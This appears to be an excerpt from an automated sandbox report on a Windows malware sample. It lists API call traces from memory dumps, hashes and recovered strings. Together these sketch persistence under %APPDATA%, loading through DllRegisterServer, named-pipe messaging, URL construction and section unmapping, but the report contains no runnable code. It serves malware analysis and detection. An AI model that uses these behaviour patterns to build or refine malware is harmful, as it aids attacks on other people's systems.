  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
